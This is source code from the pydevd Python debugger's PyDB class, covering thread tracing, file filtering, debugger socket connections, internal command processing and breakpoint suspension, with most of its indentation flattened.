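    #     py_db.get_file_type(frame) == py_db.PYDEV_FILE  # debugger-internal: never traced nor shown
    #     py_db.get_file_type(frame) == py_db.LIB_FILE    # library code: shown in the stack but not traced
    #     py_db.get_file_type(frame) is None              # user code: traced as usual
    #
    # '<string>' frames are the special case handled above: they're only treated as user
    # code when they have no non-internal back frame (the `python -c ...` case).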
def is_cache_file_type_empty(self):
return not _CACHE_FILE_TYPE
def get_cache_file_type(self, _cache=_CACHE_FILE_TYPE): # i.e.: Make it local.
return _cache
def get_thread_local_trace_func(self):
try:
thread_trace_func = self._local_thread_trace_func.thread_trace_func
except AttributeError:
thread_trace_func = self.trace_dispatch
return thread_trace_func
def enable_tracing(self, thread_trace_func=None, apply_to_all_threads=False):
'''
Enables tracing.
If in regular mode (tracing), will set the tracing function to the tracing
function for this thread -- by default it's `PyDB.trace_dispatch`, but after
`PyDB.enable_tracing` is called with a `thread_trace_func`, the given function will
be the default for the given thread.
:param bool apply_to_all_threads:
If True we'll set the tracing function in all threads, not only in the current thread.
            If False only the tracing for the current thread should be changed.
In general apply_to_all_threads should only be true if this is the first time
this function is called on a multi-threaded program (either programmatically or attach
to pid).
'''
if self.frame_eval_func is not None:
self.frame_eval_func()
pydevd_tracing.SetTrace(self.dummy_trace_dispatch)
if IS_CPYTHON and apply_to_all_threads:
pydevd_tracing.set_trace_to_threads(self.dummy_trace_dispatch)
return
if apply_to_all_threads:
# If applying to all threads, don't use the local thread trace function.
assert thread_trace_func is not None
else:
if thread_trace_func is None:
thread_trace_func = self.get_thread_local_trace_func()
else:
self._local_thread_trace_func.thread_trace_func = thread_trace_func
pydevd_tracing.SetTrace(thread_trace_func)
if IS_CPYTHON and apply_to_all_threads:
pydevd_tracing.set_trace_to_threads(thread_trace_func)
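    # Illustrative usage (not executed here; assumes an already-configured PyDB instance `py_db`):
    #
    #     py_db.enable_tracing()                            # trace only the current thread
    #     py_db.enable_tracing(py_db.trace_dispatch,
    #                          apply_to_all_threads=True)   # trace every existing thread
    #     py_db.disable_tracing()                           # stop tracing the current thread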
def disable_tracing(self):
pydevd_tracing.SetTrace(None)
def on_breakpoints_changed(self, removed=False):
'''
When breakpoints change, we have to re-evaluate all the assumptions we've made so far.
'''
if not self.ready_to_run:
# No need to do anything if we're still not running.
return
self.mtime += 1
if not removed:
# When removing breakpoints we can leave tracing as was, but if a breakpoint was added
# we have to reset the tracing for the existing functions to be re-evaluated.
self.set_tracing_for_untraced_contexts()
def set_tracing_for_untraced_contexts(self):
# Enable the tracing for existing threads (because there may be frames being executed that
# are currently untraced).
if IS_CPYTHON:
# Note: use sys._current_frames instead of threading.enumerate() because this way
# we also see C/C++ threads, not only the ones visible to the threading module.
tid_to_frame = sys._current_frames()
ignore_thread_ids = set(
t.ident for t in threadingEnumerate()
if getattr(t, 'is_pydev_daemon_thread', False) or getattr(t, 'pydev_do_not_trace', False)
)
for thread_id, frame in tid_to_frame.items():
if thread_id not in ignore_thread_ids:
self.set_trace_for_frame_and_parents(frame)
else:
try:
threads = threadingEnumerate()
for t in threads:
if getattr(t, 'is_pydev_daemon_thread', False) or getattr(t, 'pydev_do_not_trace', False):
continue
additional_info = set_additional_thread_info(t)
frame = additional_info.get_topmost_frame(t)
try:
if frame is not None:
self.set_trace_for_frame_and_parents(frame)
finally:
frame = None
finally:
frame = None
t = None
threads = None
additional_info = None
@property
def multi_threads_single_notification(self):
return self._threads_suspended_single_notification.multi_threads_single_notification
@multi_threads_single_notification.setter
def multi_threads_single_notification(self, notify):
self._threads_suspended_single_notification.multi_threads_single_notification = notify
@property
def threads_suspended_single_notification(self):
return self._threads_suspended_single_notification
def get_plugin_lazy_init(self):
if self.plugin is None and SUPPORT_PLUGINS:
self.plugin = PluginManager(self)
return self.plugin
def in_project_scope(self, frame, absolute_filename=None):
'''
Note: in general this method should not be used (apply_files_filter should be used
in most cases as it also handles the project scope check).
:param frame:
The frame we want to check.
:param absolute_filename:
Must be the result from get_abs_path_real_path_and_base_from_frame(frame)[0] (can
be used to speed this function a bit if it's already available to the caller, but
in general it's not needed).
'''
try:
if absolute_filename is None:
try:
# Make fast path faster!
abs_real_path_and_basename = NORM_PATHS_AND_BASE_CONTAINER[frame.f_code.co_filename]
except:
abs_real_path_and_basename = get_abs_path_real_path_and_base_from_frame(frame)
absolute_filename = abs_real_path_and_basename[0]
cache_key = (frame.f_code.co_firstlineno, absolute_filename, frame.f_code)
return self._in_project_scope_cache[cache_key]
except KeyError:
cache = self._in_project_scope_cache
try:
abs_real_path_and_basename # If we've gotten it previously, use it again.
except NameError:
abs_real_path_and_basename = get_abs_path_real_path_and_base_from_frame(frame)
# pydevd files are never considered to be in the project scope.
file_type = self.get_file_type(frame, abs_real_path_and_basename)
if file_type == self.PYDEV_FILE:
cache[cache_key] = False
elif absolute_filename == '<string>':
# Special handling for '<string>'
if file_type == self.LIB_FILE:
cache[cache_key] = False
else:
cache[cache_key] = True
elif self.source_mapping.has_mapping_entry(absolute_filename):
cache[cache_key] = True
else:
cache[cache_key] = self._files_filtering.in_project_roots(absolute_filename)
return cache[cache_key]
def _clear_filters_caches(self):
self._in_project_scope_cache.clear()
self._exclude_by_filter_cache.clear()
self._apply_filter_cache.clear()
self._exclude_filters_enabled = self._files_filtering.use_exclude_filters()
self._is_libraries_filter_enabled = self._files_filtering.use_libraries_filter()
self.is_files_filter_enabled = self._exclude_filters_enabled or self._is_libraries_filter_enabled
def clear_dont_trace_start_end_patterns_caches(self):
# When start/end patterns are changed we must clear all caches which would be
# affected by a change in get_file_type() and reset the tracing function
# as places which were traced may no longer need to be traced and vice-versa.
self.on_breakpoints_changed()
_CACHE_FILE_TYPE.clear()
self._clear_filters_caches()
self._clear_skip_caches()
def _exclude_by_filter(self, frame, absolute_filename):
'''
:return: True if it should be excluded, False if it should be included and None
if no rule matched the given file.
:note: it'll be normalized as needed inside of this method.
'''
cache_key = (absolute_filename, frame.f_code.co_name, frame.f_code.co_firstlineno)
try:
return self._exclude_by_filter_cache[cache_key]
except KeyError:
cache = self._exclude_by_filter_cache
# pydevd files are always filtered out
if self.get_file_type(frame) == self.PYDEV_FILE:
cache[cache_key] = True
else:
module_name = None
if self._files_filtering.require_module:
module_name = frame.f_globals.get('__name__', '')
cache[cache_key] = self._files_filtering.exclude_by_filter(absolute_filename, module_name)
return cache[cache_key]
def apply_files_filter(self, frame, original_filename, force_check_project_scope):
'''
Should only be called if `self.is_files_filter_enabled == True` or `force_check_project_scope == True`.
Note that it covers both the filter by specific paths includes/excludes as well
as the check which filters out libraries if not in the project scope.
:param original_filename:
Note can either be the original filename or the absolute version of that filename.
:param force_check_project_scope:
Check that the file is in the project scope even if the global setting
is off.
:return bool:
True if it should be excluded when stepping and False if it should be
included.
'''
cache_key = (frame.f_code.co_firstlineno, original_filename, force_check_project_scope, frame.f_code)
try:
return self._apply_filter_cache[cache_key]
except KeyError:
if self.plugin is not None and (self.has_plugin_line_breaks or self.has_plugin_exception_breaks):
# If it's explicitly needed by some plugin, we can't skip it.
if not self.plugin.can_skip(self, frame):
pydev_log.debug_once('File traced (included by plugins): %s', original_filename)
self._apply_filter_cache[cache_key] = False
return False
if self._exclude_filters_enabled:
absolute_filename = pydevd_file_utils.absolute_path(original_filename)
exclude_by_filter = self._exclude_by_filter(frame, absolute_filename)
if exclude_by_filter is not None:
if exclude_by_filter:
# ignore files matching stepping filters
pydev_log.debug_once('File not traced (excluded by filters): %s', original_filename)
self._apply_filter_cache[cache_key] = True
return True
else:
pydev_log.debug_once('File traced (explicitly included by filters): %s', original_filename)
self._apply_filter_cache[cache_key] = False
return False
if (self._is_libraries_filter_enabled or force_check_project_scope) and not self.in_project_scope(frame):
# ignore library files while stepping
self._apply_filter_cache[cache_key] = True
                if force_check_project_scope:
                    pydev_log.debug_once('File not traced (not in project - force_check_project_scope): %s', original_filename)
                else:
                    pydev_log.debug_once('File not traced (not in project): %s', original_filename)
return True
if force_check_project_scope:
pydev_log.debug_once('File traced: %s (force_check_project_scope)', original_filename)
else:
pydev_log.debug_once('File traced: %s', original_filename)
self._apply_filter_cache[cache_key] = False
return False
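    # Illustrative decision order (comments only) inside apply_files_filter():
    #
    #     1. a plugin needs the frame          -> False (trace it)
    #     2. exclude filters match             -> True/False according to the matching filter
    #     3. libraries filter / project scope  -> True (skip) when the frame is outside the project
    #     4. otherwise                         -> False (trace it)
    #
    # True means "exclude when stepping", False means "step into it"; results are cached
    # per (first line, filename, force_check_project_scope, code object).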
def exclude_exception_by_filter(self, exception_breakpoint, trace):
if not exception_breakpoint.ignore_libraries and not self._exclude_filters_enabled:
return False
if trace is None:
return True
ignore_libraries = exception_breakpoint.ignore_libraries
exclude_filters_enabled = self._exclude_filters_enabled
if (ignore_libraries and not self.in_project_scope(trace.tb_frame)) \
or (exclude_filters_enabled and self._exclude_by_filter(
trace.tb_frame,
pydevd_file_utils.absolute_path(trace.tb_frame.f_code.co_filename))):
return True
return False
def set_project_roots(self, project_roots):
self._files_filtering.set_project_roots(project_roots)
self._clear_skip_caches()
self._clear_filters_caches()
def set_exclude_filters(self, exclude_filters):
self._files_filtering.set_exclude_filters(exclude_filters)
self._clear_skip_caches()
self._clear_filters_caches()
def set_use_libraries_filter(self, use_libraries_filter):
self._files_filtering.set_use_libraries_filter(use_libraries_filter)
self._clear_skip_caches()
self._clear_filters_caches()
def get_use_libraries_filter(self):
return self._files_filtering.use_libraries_filter()
def get_require_module_for_filters(self):
return self._files_filtering.require_module
def has_user_threads_alive(self):
for t in pydevd_utils.get_non_pydevd_threads():
if isinstance(t, PyDBDaemonThread):
pydev_log.error_once(
'Error in debugger: Found PyDBDaemonThread not marked with is_pydev_daemon_thread=True.\n')
if is_thread_alive(t):
if not t.isDaemon() or hasattr(t, "__pydevd_main_thread"):
return True
return False
def initialize_network(self, sock, terminate_on_socket_close=True):
assert sock is not None
try:
sock.settimeout(None) # infinite, no timeouts from now on - jython does not have it
except:
pass
curr_reader = getattr(self, 'reader', None)
curr_writer = getattr(self, 'writer', None)
if curr_reader:
curr_reader.do_kill_pydev_thread()
if curr_writer:
curr_writer.do_kill_pydev_thread()
self.writer = WriterThread(sock, self, terminate_on_socket_close=terminate_on_socket_close)
self.reader = ReaderThread(
sock,
self,
PyDevJsonCommandProcessor=PyDevJsonCommandProcessor,
process_net_command=process_net_command,
terminate_on_socket_close=terminate_on_socket_close
)
self.writer.start()
self.reader.start()
time.sleep(0.1) # give threads time to start
def connect(self, host, port):
if host:
s = start_client(host, port)
else:
s = start_server(port)
self.initialize_network(s)
def create_wait_for_connection_thread(self):
if self._waiting_for_connection_thread is not None:
raise AssertionError('There is already another thread waiting for a connection.')
self._server_socket_ready_event.clear()
self._waiting_for_connection_thread = self._WaitForConnectionThread(self)
self._waiting_for_connection_thread.start()
def set_server_socket_ready(self):
self._server_socket_ready_event.set()
def wait_for_server_socket_ready(self):
self._server_socket_ready_event.wait()
@property
def dap_messages_listeners(self):
return self._dap_messages_listeners
def add_dap_messages_listener(self, listener):
self._dap_messages_listeners.append(listener)
class _WaitForConnectionThread(PyDBDaemonThread):
def __init__(self, py_db):
PyDBDaemonThread.__init__(self, py_db)
self._server_socket = None
def run(self):
host = SetupHolder.setup['client']
port = SetupHolder.setup['port']
self._server_socket = create_server_socket(host=host, port=port)
self.py_db._server_socket_name = self._server_socket.getsockname()
self.py_db.set_server_socket_ready()
while not self._kill_received:
try:
s = self._server_socket
if s is None:
return
s.listen(1)
new_socket, _addr = s.accept()
if self._kill_received:
pydev_log.info("Connection (from wait_for_attach) accepted but ignored as kill was already received.")
return
pydev_log.info("Connection (from wait_for_attach) accepted.")
reader = getattr(self.py_db, 'reader', None)
if reader is not None:
# This is needed if a new connection is done without the client properly
# sending a disconnect for the previous connection.
api = PyDevdAPI()
api.request_disconnect(self.py_db, resume_threads=False)
self.py_db.initialize_network(new_socket, terminate_on_socket_close=False)
except:
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 0:
pydev_log.exception()
pydev_log.debug("Exiting _WaitForConnectionThread: %s\n", port)
def do_kill_pydev_thread(self):
PyDBDaemonThread.do_kill_pydev_thread(self)
s = self._server_socket
if s is not None:
try:
s.close()
except:
pass
self._server_socket = None
def get_internal_queue(self, thread_id):
""" returns internal command queue for a given thread.
if new queue is created, notify the RDB about it """
if thread_id.startswith('__frame__'):
thread_id = thread_id[thread_id.rfind('|') + 1:]
return self._cmd_queue[thread_id]
def post_method_as_internal_command(self, thread_id, method, *args, **kwargs):
if thread_id == '*':
internal_cmd = InternalThreadCommandForAnyThread(thread_id, method, *args, **kwargs)
else:
internal_cmd = InternalThreadCommand(thread_id, method, *args, **kwargs)
self.post_internal_command(internal_cmd, thread_id)
if thread_id == '*':
# Notify so that the command is handled as soon as possible.
self._py_db_command_thread_event.set()
def post_internal_command(self, int_cmd, thread_id):
""" if thread_id is *, post to the '*' queue"""
queue = self.get_internal_queue(thread_id)
queue.put(int_cmd)
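    # Illustrative usage (not executed; `some_callable` and its arguments are hypothetical):
    # scheduling work to run on a given thread -- or on any thread with '*' -- through the
    # internal command queue.
    #
    #     py_db.post_method_as_internal_command('*', some_callable, arg, kwarg=value)
    #
    # The command is later picked up by process_internal_commands() on a thread that is
    # allowed to execute it.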
def enable_output_redirection(self, redirect_stdout, redirect_stderr):
global _global_redirect_stdout_to_server
global _global_redirect_stderr_to_server
_global_redirect_stdout_to_server = redirect_stdout
_global_redirect_stderr_to_server = redirect_stderr
self.redirect_output = redirect_stdout or redirect_stderr
if _global_redirect_stdout_to_server:
_init_stdout_redirect()
if _global_redirect_stderr_to_server:
_init_stderr_redirect()
def check_output_redirect(self):
global _global_redirect_stdout_to_server
global _global_redirect_stderr_to_server
if _global_redirect_stdout_to_server:
_init_stdout_redirect()
if _global_redirect_stderr_to_server:
_init_stderr_redirect()
def init_matplotlib_in_debug_console(self):
# import hook and patches for matplotlib support in debug console
from _pydev_bundle.pydev_import_hook import import_hook_manager
if is_current_thread_main_thread():
for module in dict_keys(self.mpl_modules_for_patching):
import_hook_manager.add_module_name(module, self.mpl_modules_for_patching.pop(module))
def init_matplotlib_support(self):
# prepare debugger for integration with matplotlib GUI event loop
from pydev_ipython.matplotlibtools import activate_matplotlib, activate_pylab, activate_pyplot, do_enable_gui
# enable_gui_function in activate_matplotlib should be called in main thread. Unlike integrated console,
# in the debug console we have no interpreter instance with exec_queue, but we run this code in the main
# thread and can call it directly.
class _MatplotlibHelper:
_return_control_osc = False
def return_control():
# Some of the input hooks (e.g. Qt4Agg) check return control without doing
# a single operation, so we don't return True on every
# call when the debug hook is in place to allow the GUI to run
_MatplotlibHelper._return_control_osc = not _MatplotlibHelper._return_control_osc
return _MatplotlibHelper._return_control_osc
from pydev_ipython.inputhook import set_return_control_callback
set_return_control_callback(return_control)
self.mpl_modules_for_patching = {"matplotlib": lambda: activate_matplotlib(do_enable_gui),
"matplotlib.pyplot": activate_pyplot,
"pylab": activate_pylab }
def _activate_mpl_if_needed(self):
if len(self.mpl_modules_for_patching) > 0:
if is_current_thread_main_thread(): # Note that we call only in the main thread.
for module in dict_keys(self.mpl_modules_for_patching):
if module in sys.modules:
activate_function = self.mpl_modules_for_patching.pop(module, None)
if activate_function is not None:
activate_function()
self.mpl_in_use = True
def _call_mpl_hook(self):
try:
from pydev_ipython.inputhook import get_inputhook
inputhook = get_inputhook()
if inputhook:
inputhook()
except:
pass
def notify_skipped_step_in_because_of_filters(self, frame):
self.writer.add_command(self.cmd_factory.make_skipped_step_in_because_of_filters(self, frame))
def notify_thread_created(self, thread_id, thread, use_lock=True):
if self.writer is None:
# Protect about threads being created before the communication structure is in place
            # (note that they will appear later on anyway as pydevd does reconcile live/dead threads
            # when processing internal commands, although it may take longer; in general this should
            # not be common as the debugger is expected to be live before other threads are created).
return
with self._lock_running_thread_ids if use_lock else NULL:
if not self._enable_thread_notifications:
return
if thread_id in self._running_thread_ids:
return
additional_info = set_additional_thread_info(thread)
if additional_info.pydev_notify_kill:
                # After we notify that it should be killed, make sure we don't notify that it's alive (in a race
                # condition this could happen as we may notify before the thread is stopped internally).
return
self._running_thread_ids[thread_id] = thread
self.writer.add_command(self.cmd_factory.make_thread_created_message(thread))
def notify_thread_not_alive(self, thread_id, use_lock=True):
""" if thread is not alive, cancel trace_dispatch processing """
if self.writer is None:
return
with self._lock_running_thread_ids if use_lock else NULL:
if not self._enable_thread_notifications:
return
thread = self._running_thread_ids.pop(thread_id, None)
if thread is None:
return
additional_info = set_additional_thread_info(thread)
was_notified = additional_info.pydev_notify_kill
if not was_notified:
additional_info.pydev_notify_kill = True
self.writer.add_command(self.cmd_factory.make_thread_killed_message(thread_id))
def set_enable_thread_notifications(self, enable):
with self._lock_running_thread_ids:
if self._enable_thread_notifications != enable:
self._enable_thread_notifications = enable
if enable:
# As it was previously disabled, we have to notify about existing threads again
# (so, clear the cache related to that).
self._running_thread_ids = {}
def process_internal_commands(self):
'''
This function processes internal commands.
'''
# If this method is being called before the debugger is ready to run we should not notify
# about threads and should only process commands sent to all threads.
ready_to_run = self.ready_to_run
dispose = False
with self._main_lock:
program_threads_alive = {}
if ready_to_run:
self.check_output_redirect()
all_threads = threadingEnumerate()
program_threads_dead = []
with self._lock_running_thread_ids:
reset_cache = not self._running_thread_ids
for t in all_threads:
if getattr(t, 'is_pydev_daemon_thread', False):
pass # I.e.: skip the DummyThreads created from pydev daemon threads
elif isinstance(t, PyDBDaemonThread):
pydev_log.error_once('Error in debugger: Found PyDBDaemonThread not marked with is_pydev_daemon_thread=True.')
elif is_thread_alive(t):
if reset_cache:
# Fix multiprocessing debug with breakpoints in both main and child processes
# (https://youtrack.jetbrains.com/issue/PY-17092) When the new process is created, the main
# thread in the new process already has the attribute 'pydevd_id', so the new thread doesn't
# get new id with its process number and the debugger loses access to both threads.
# Therefore we should update thread_id for every main thread in the new process.
clear_cached_thread_id(t)
thread_id = get_thread_id(t)
program_threads_alive[thread_id] = t
self.notify_thread_created(thread_id, t, use_lock=False)
# Compute and notify about threads which are no longer alive.
thread_ids = list(self._running_thread_ids.keys())
for thread_id in thread_ids:
if thread_id not in program_threads_alive:
program_threads_dead.append(thread_id)
for thread_id in program_threads_dead:
self.notify_thread_not_alive(thread_id, use_lock=False)
cmds_to_execute = []
# Without self._lock_running_thread_ids
if len(program_threads_alive) == 0 and ready_to_run:
dispose = True
else:
# Actually process the commands now (make sure we don't have a lock for _lock_running_thread_ids
# acquired at this point as it could lead to a deadlock if some command evaluated tried to
# create a thread and wait for it -- which would try to notify about it getting that lock).
curr_thread_id = get_current_thread_id(threadingCurrentThread())
if ready_to_run:
process_thread_ids = (curr_thread_id, '*')
else:
process_thread_ids = ('*',)
for thread_id in process_thread_ids:
queue = self.get_internal_queue(thread_id)
# some commands must be processed by the thread itself... if that's the case,
# we will re-add the commands to the queue after executing.
cmds_to_add_back = []
try:
while True:
int_cmd = queue.get(False)
if not self.mpl_hooks_in_debug_console and isinstance(int_cmd, InternalConsoleExec):
                                # Add import hooks for matplotlib patches if only the debug console was started.
try:
self.init_matplotlib_in_debug_console()
self.mpl_in_use = True
except:
pydev_log.debug("Matplotlib support in debug console failed", traceback.format_exc())
self.mpl_hooks_in_debug_console = True
if int_cmd.can_be_executed_by(curr_thread_id):
cmds_to_execute.append(int_cmd)
else:
pydev_log.verbose("NOT processing internal command: %s ", int_cmd)
cmds_to_add_back.append(int_cmd)
except _queue.Empty: # @UndefinedVariable
# this is how we exit
for int_cmd in cmds_to_add_back:
queue.put(int_cmd)
if dispose:
# Note: must be called without the main lock to avoid deadlocks.
self.dispose_and_kill_all_pydevd_threads()
else:
# Actually execute the commands without the main lock!
for int_cmd in cmds_to_execute:
pydev_log.verbose("processing internal command: %s", int_cmd)
try:
int_cmd.do_it(self)
except:
pydev_log.exception('Error processing internal command.')
def consolidate_breakpoints(self, canonical_normalized_filename, id_to_breakpoint, breakpoints):
break_dict = {}
for _breakpoint_id, pybreakpoint in dict_iter_items(id_to_breakpoint):
break_dict[pybreakpoint.line] = pybreakpoint
breakpoints[canonical_normalized_filename] = break_dict
self._clear_skip_caches()
def _clear_skip_caches(self):
global_cache_skips.clear()
global_cache_frame_skips.clear()
def add_break_on_exception(
self,
exception,
condition,
expression,
notify_on_handled_exceptions,
notify_on_unhandled_exceptions,
notify_on_user_unhandled_exceptions,
notify_on_first_raise_only,
ignore_libraries=False
):
try:
eb = ExceptionBreakpoint(
exception,
condition,
expression,
notify_on_handled_exceptions,
notify_on_unhandled_exceptions,
notify_on_user_unhandled_exceptions,
notify_on_first_raise_only,
ignore_libraries
)
except ImportError:
pydev_log.critical("Error unable to add break on exception for: %s (exception could not be imported).", exception)
return None
if eb.notify_on_unhandled_exceptions:
cp = self.break_on_uncaught_exceptions.copy()
cp[exception] = eb
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
pydev_log.critical("Exceptions to hook on terminate: %s.", cp)
self.break_on_uncaught_exceptions = cp
if eb.notify_on_handled_exceptions:
cp = self.break_on_caught_exceptions.copy()
cp[exception] = eb
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
pydev_log.critical("Exceptions to hook always: %s.", cp)
self.break_on_caught_exceptions = cp
if eb.notify_on_user_unhandled_exceptions:
cp = self.break_on_user_uncaught_exceptions.copy()
cp[exception] = eb
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
pydev_log.critical("Exceptions to hook on user uncaught code: %s.", cp)
self.break_on_user_uncaught_exceptions = cp
return eb
def set_suspend(self, thread, stop_reason, suspend_other_threads=False, is_pause=False, original_step_cmd=-1):
'''
:param thread:
The thread which should be suspended.
:param stop_reason:
Reason why the thread was suspended.
:param suspend_other_threads:
Whether to force other threads to be suspended (i.e.: when hitting a breakpoint
with a suspend all threads policy).
:param is_pause:
If this is a pause to suspend all threads, any thread can be considered as the 'main'
thread paused.
:param original_step_cmd:
If given we may change the stop reason to this.
'''
self._threads_suspended_single_notification.increment_suspend_time()
if is_pause:
self._threads_suspended_single_notification.on_pause()
info = mark_thread_suspended(thread, stop_reason, original_step_cmd=original_step_cmd)
if is_pause:
# Must set tracing after setting the state to suspend.
frame = info.get_topmost_frame(thread)
if frame is not None:
try:
self.set_trace_for_frame_and_parents(frame)
finally:
frame = None
# If conditional breakpoint raises any exception during evaluation send the details to the client.
if stop_reason == CMD_SET_BREAK and info.conditional_breakpoint_exception is not None:
conditional_breakpoint_exception_tuple = info.conditional_breakpoint_exception
info.conditional_breakpoint_exception = None
self._send_breakpoint_condition_exception(thread, conditional_breakpoint_exception_tuple)
if not suspend_other_threads and self.multi_threads_single_notification:
# In the mode which gives a single notification when all threads are
# stopped, stop all threads whenever a set_suspend is issued.
suspend_other_threads = True
if suspend_other_threads:
# Suspend all except the current one (which we're currently suspending already).
suspend_all_threads(self, except_thread=thread)
def _send_breakpoint_condition_exception(self, thread, conditional_breakpoint_exception_tuple):
"""If conditional breakpoint raises an exception during evaluation
send exception details to java
"""
thread_id = get_thread_id(thread)
# conditional_breakpoint_exception_tuple - should contain 2 values (exception_type, stacktrace)
if conditional_breakpoint_exception_tuple and len(conditional_breakpoint_exception_tuple) == 2:
exc_type, stacktrace = conditional_breakpoint_exception_tuple
int_cmd = InternalGetBreakpointException(thread_id, exc_type, stacktrace)
self.post_internal_command(int_cmd, thread_id)
def send_caught_exception_stack(self, thread, arg, curr_frame_id):
"""Sends details on the exception which was caught (and where we stopped) to the java side.
arg is: exception type, description, traceback object
"""
thread_id = get_thread_id(thread)
int_cmd = InternalSendCurrExceptionTrace(thread_id, arg, curr_frame_id)
self.post_internal_command(int_cmd, thread_id)
def send_caught_exception_stack_proceeded(self, thread):
"""Sends that some thread was resumed and is no longer showing an exception trace.
"""
thread_id = get_thread_id(thread)
int_cmd = InternalSendCurrExceptionTraceProceeded(thread_id)
self.post_internal_command(int_cmd, thread_id)
self.process_internal_commands()
def send_process_created_message(self):
"""Sends a message that a new process has been created.
"""
if self.writer is None or self.cmd_factory is None:
return
cmd = self.cmd_factory.make_process_created_message()
self.writer.add_command(cmd)
def set_next_statement(self, frame, event, func_name, next_line):
stop = False
response_msg = ""
old_line = frame.f_lineno
if event == 'line' or event == 'exception':
# If we're already in the correct context, we have to stop it now, because we can act only on
# line events -- if a return was the next statement it wouldn't work (so, we have this code
# repeated at pydevd_frame).
curr_func_name = frame.f_code.co_name
# global context is set with an empty name
if curr_func_name in ('?', '<module>'):
curr_func_name = ''
if func_name == '*' or curr_func_name == func_name:
line = next_line
frame.f_trace = self.trace_dispatch
frame.f_lineno = line
stop = True
else:
response_msg = "jump is available only within the bottom frame"
return stop, old_line, response_msg
def cancel_async_evaluation(self, thread_id, frame_id):
with self._main_lock:
try:
all_threads = threadingEnumerate()
for t in all_threads:
if getattr(t, 'is_pydev_daemon_thread', False) and hasattr(t, 'cancel_event') and t.thread_id == thread_id and \
t.frame_id == frame_id:
t.cancel_event.set()
except:
pydev_log.exception()
def find_frame(self, thread_id, frame_id):
""" returns a frame on the thread that has a given frame_id """
return self.suspended_frames_manager.find_frame(thread_id, frame_id)
def do_wait_suspend(self, thread, frame, event, arg, exception_type=None): # @UnusedVariable
""" busy waits until the thread state changes to RUN
it expects thread's state as attributes of the thread.
Upon running, processes any outstanding Stepping commands.
:param exception_type:
If pausing due to an exception, its type.
"""
if USE_CUSTOM_SYS_CURRENT_FRAMES_MAP:
constructed_tid_to_last_frame[thread.ident] = sys._getframe()
self.process_internal_commands()
thread_id = get_current_thread_id(thread)
# print('do_wait_suspend %s %s %s %s %s %s (%s)' % (frame.f_lineno, frame.f_code.co_name, frame.f_code.co_filename, event, arg, constant_to_str(thread.additional_info.pydev_step_cmd), constant_to_str(thread.additional_info.pydev_original_step_cmd)))
# Send the suspend message
message = thread.additional_info.pydev_message
suspend_type = thread.additional_info.trace_suspend_type
thread.additional_info.trace_suspend_type = 'trace' # Reset to trace mode for next call.
stop_reason = thread.stop_reason
frames_list = None
if arg is not None and event == 'exception':
# arg must be the exception info (tuple(exc_type, exc, traceback))
exc_type, exc_desc, trace_obj = arg
if trace_obj is not None:
frames_list = pydevd_frame_utils.create_frames_list_from_traceback(trace_obj, frame, exc_type, exc_desc, exception_type=exception_type)
if frames_list is None:
frames_list = pydevd_frame_utils.create_frames_list_from_frame(frame)
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 2:
pydev_log.debug(
'PyDB.do_wait_suspend\nname: %s (line: %s)\n file: %s\n event: %s\n arg: %s\n step: %s (original step: %s)\n thread: %s, thread id: %s, id(thread): %s',
frame.f_code.co_name,
frame.f_lineno,
frame.f_code.co_filename,
event,
arg,
constant_to_str(thread.additional_info.pydev_step_cmd),
constant_to_str(thread.additional_info.pydev_original_step_cmd),
thread,
thread_id,
id(thread),
)
for f in frames_list:
pydev_log.debug(' Stack: %s, %s, %s', f.f_code.co_filename, f.f_code.co_name, f.f_lineno)
with self.suspended_frames_manager.track_frames(self) as frames_tracker:
frames_tracker.track(thread_id, frames_list)
cmd = frames_tracker.create_thread_suspend_command(thread_id, stop_reason, message, suspend_type)
self.writer.add_command(cmd)
with CustomFramesContainer.custom_frames_lock: # @UndefinedVariable
from_this_thread = []
for frame_custom_thread_id, custom_frame in dict_iter_items(CustomFramesContainer.custom_frames):
if custom_frame.thread_id == thread.ident:
frames_tracker.track(thread_id, pydevd_frame_utils.create_frames_list_from_frame(custom_frame.frame), frame_custom_thread_id=frame_custom_thread_id)
# print('Frame created as thread: %s' % (frame_custom_thread_id,))
self.writer.add_command(self.cmd_factory.make_custom_frame_created_message(
frame_custom_thread_id, custom_frame.name))
self.writer.add_command(
frames_tracker.create_thread_suspend_command(frame_custom_thread_id, CMD_THREAD_SUSPEND, "", suspend_type))
from_this_thread.append(frame_custom_thread_id)
with self._threads_suspended_single_notification.notify_thread_suspended(thread_id, stop_reason):
keep_suspended = self._do_wait_suspend(thread, frame, event, arg, suspend_type, from_this_thread, frames_tracker)
frames_list = None
if keep_suspended:
# This means that we should pause again after a set next statement.
self._threads_suspended_single_notification.increment_suspend_time()
self.do_wait_suspend(thread, frame, event, arg, exception_type)
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 2:
pydev_log.debug('Leaving PyDB.do_wait_suspend: %s (%s) %s', thread, thread_id, id(thread))
def _do_wait_suspend(self, thread, frame, event, arg, suspend_type, from_this_thread, frames_tracker):
info = thread.additional_info
info.step_in_initial_location = None
keep_suspended = False
with self._main_lock: # Use lock to check if suspended state changed
activate_matplotlib = info.pydev_state == STATE_SUSPEND and not self.pydb_disposed
in_main_thread = is_current_thread_main_thread()
if activate_matplotlib and in_main_thread:
# before every stop check if matplotlib modules were imported inside script code
self._activate_mpl_if_needed()
while True:
with self._main_lock: # Use lock to check if suspended state changed
if info.pydev_state != STATE_SUSPEND or (self.pydb_disposed and not self.terminate_requested):
# Note: we can't exit here if terminate was requested while a breakpoint was hit.
break
if in_main_thread and self.mpl_in_use:
# call input hooks if only matplotlib is in use
self._call_mpl_hook()
self.process_internal_commands()
time.sleep(0.01)
self.cancel_async_evaluation(get_current_thread_id(thread), str(id(frame)))
# process any stepping instructions
if info.pydev_step_cmd in (CMD_STEP_INTO, CMD_STEP_INTO_MY_CODE):
info.step_in_initial_location = (frame, frame.f_lineno)
if frame.f_code.co_flags & 0x80: # CO_COROUTINE = 0x80
# When in a coroutine we switch to CMD_STEP_INTO_COROUTINE.
info.pydev_step_cmd = CMD_STEP_INTO_COROUTINE
info.pydev_step_stop = frame
info.pydev_smart_step_stop = None
self.set_trace_for_frame_and_parents(frame)
else:
info.pydev_step_stop = None
info.pydev_smart_step_stop = None
self.set_trace_for_frame_and_parents(frame)
elif info.pydev_step_cmd in (CMD_STEP_OVER, CMD_STEP_OVER_MY_CODE):
